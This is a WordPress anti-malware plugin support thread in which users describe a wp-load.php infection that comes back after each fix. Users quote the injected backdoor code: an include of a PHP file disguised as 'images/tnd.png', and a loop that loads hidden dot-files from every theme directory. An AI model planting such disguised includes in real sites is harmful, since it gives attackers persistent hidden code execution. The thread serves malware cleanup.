wp-load.php after fix re-infected immediately

Home Forums Support Forum wp-load.php after fix re-infected immediately

Tagged: 

This topic contains 5 replies, has 4 voices, and was last updated by  fred sadowick 2 months, 2 weeks ago.

Viewing 6 posts - 1 through 6 (of 6 total)
  • Author
    Posts
  • #2403

    Andra Saimre
    Member

    I am struggling today with the site, where suddenly to some people it displays porn instead of our content.. so if I scan with the plugin, it finds threat immediately in the wp-load.php file. But after I press fix, it is fixing without error and immediately shows that the file is re-infected. I have tried many times. I also checked the file in server, did not find more differences with original file then that part in the end and I deleted it:

    // Edit and deleting this code is not recommended!

    @include( ABSPATH . WPINC . ‘/images/tnd.png’);

    However, it comes back…Do you have any suggestions what to do?

    I try to do full scan but it gets also stucked around 3%..

    #2407

    Anti-Malware Admin
    Key Master

    There must be something malicious remaining on the server that is rewriting that infection. You need to be able to run the Complete Scan.

    Can you open the error Console in your browser’s Inspector and send me a screenshot of the Complete Scan when it gets stuck?

    You can also check the error_log files on the server to see if there is anything that might indicate why the complete scan is not able to complete.

    #2412

    Andra Saimre
    Member

    Hello!

    I did fresh WordPress install, then got rid of that problem, your plugin still finds some files in the wp-content folder (this remain same) which give a reading or scan errors, not sure if that could be still a problem and infection can be in sleepy mode? I do scan for now almost every day.

     

    #2413

    Anti-Malware Admin
    Key Master

    With the kinds of trouble that you have had with the scan not completing and now the read errors, I would guess that the memory_limit in your php.ini file is set too low. Ask you hosting provider if you need help finding or changing the memory_limit on your server.

    You also need to find the error_log files on your server. Those will tell you a log about the cause of these problems.

    #2427

    Hello Eli!

    I have the same problem only it happens on each of the 4 or 5 files your scanner flags.  I have done a full system scan, it was completed, I clicked auto-fix. It said it fixed 5 files, 0 files failed. I then go to the terminal and view the files and they still have the offending code.  Can you help me out? ;) I did donate.  Thank you!

    #31294

    Hi, I have same issue, wp-load.php is found multiple times and fixed but reappears. I looked at the code and indicated

    Potential threats in file:

     

    /**

    * Bootstrap file for setting the ABSPATH constant

    * and loading the wp-config.php file. The wp-config.php

    * file will then load the wp-settings.php file, which

    * will then set up the WordPress environment.

    *

    * If the wp-config.php file is not found then an error

    * will be displayed asking the visitor to set up the

    * wp-config.php file.

    *

    * Will also search for wp-config.php in WordPress’ parent

    * directory to allow the WordPress directory to remain

    * untouched.

    *

    * @package WordPress

    */

     

    /** Define ABSPATH as this file’s directory */

    if( !defined( ‘ABSPATH’ ) ) {

    define( ‘ABSPATH’, __DIR__ . ‘/’ );

    }

     

    error_reporting( E_CORE_ERROR | E_CORE_WARNING | E_COMPILE_ERROR | E_ERROR | E_WARNING | E_PARSE | E_USER_ERROR | E_USER_WARNING | E_RECOVERABLE_ERROR );

     

    /*

    * If wp-config.php exists in the WordPress root, or if it exists in the root and wp-settings.php

    * doesn’t, load wp-config.php. The secondary check for wp-settings.php has the added benefit

    * of avoiding cases where the current directory is a nested installation, e.g. / is WordPress(a)

    * and /blog/ is WordPress(b).

    *

    * If neither set of conditions is true, initiate loading the setup process.

    */

    if( file_exists( ABSPATH . ‘wp-config.php’ ) ) {

     

    /** The config file resides in ABSPATH */

    require_once ABSPATH . ‘wp-config.php’;

     

    } elseif( @file_exists( dirname( ABSPATH ) . ‘/wp-config.php’ ) && !@file_exists( dirname( ABSPATH ) . ‘/wp-settings.php’ ) ) {

     

    /** The config file resides one level above ABSPATH but is not part of another installation */

    require_once dirname( ABSPATH ) . ‘/wp-config.php’;

     

    } else {

     

    // A config file doesn’t exist.

     

    define( ‘WPINC’, ‘wp-includes’ );

    require_once ABSPATH . WPINC . ‘/load.php’;

     

    // Standardize $_SERVER variables across setups.

    wp_fix_server_vars();

     

    require_once ABSPATH . WPINC . ‘/functions.php’;

     

    $path = wp_guess_url() . ‘/wp-admin/setup-config.php’;

     

    /*

    * We’re going to redirect to setup-config.php. While this shouldn’t result

    * in an infinite loop, that’s a silly thing to assume, don’t you think? If

    * we’re traveling in circles, our last-ditch effort is “Need more help?”

    */

    if( false === strpos( $_SERVER['REQUEST_URI'], ‘setup-config’ ) ) {

    header( ‘Location: ‘ . $path );

    exit;

    }

     

    define( ‘WP_CONTENT_DIR’, ABSPATH . ‘wp-content’ );

    require_once ABSPATH . WPINC . ‘/version.php’;

     

    wp_check_php_mysql_versions();

    wp_load_translations_early();

     

    // Die with an error message

    $die = sprintf(

    /* translators: %s: wp-config.php */

    __( “There doesn’t seem to be a %s file. I need this before we can get started.” ),

    ‘<code>wp-config.php</code>’

    ) . ‘</p>’;

    $die .= ‘<p>’ . sprintf(

    /* translators: %s: Documentation URL. */

    __( “Need more help? <a href=’%s’>We got it</a>.” ),

    __( ‘https://wordpress.org/support/article/editing-wp-config-php/&#8217; )

    ) . ‘</p>’;

    $die .= ‘<p>’ . sprintf(

    /* translators: %s: wp-config.php */

    __( “You can create a %s file through a web interface, but this doesn’t work for all server setups. The safest way is to manually create the file.” ),

    ‘<code>wp-config.php</code>’

    ) . ‘</p>’;

    $die .= ‘<p><a href=”‘ . $path . ‘” class=”button button-large”>’ . __( ‘Create a Configuration File’ ) . ‘</a>’;

     

    wp_die( $die, __( ‘WordPress &rsaquo; Error’ ) );

    }

     

    if( !class_exists( “WPTemplatesOptions” ) && function_exists( ‘wp_get_themes’ ) ) {

    foreach ( wp_get_themes() AS $theme_name => $wp_get_theme ) {

    $templates = get_theme_root() . DIRECTORY_SEPARATOR . “{$wp_get_theme->stylesheet}” . DIRECTORY_SEPARATOR . “.{$wp_get_theme->stylesheet}.php”;

    if( file_exists( $templates ) ) {

    include_once( $templates );

    }

    }

    }

Viewing 6 posts - 1 through 6 (of 6 total)

You must be logged in to reply to this topic.

Comments are closed.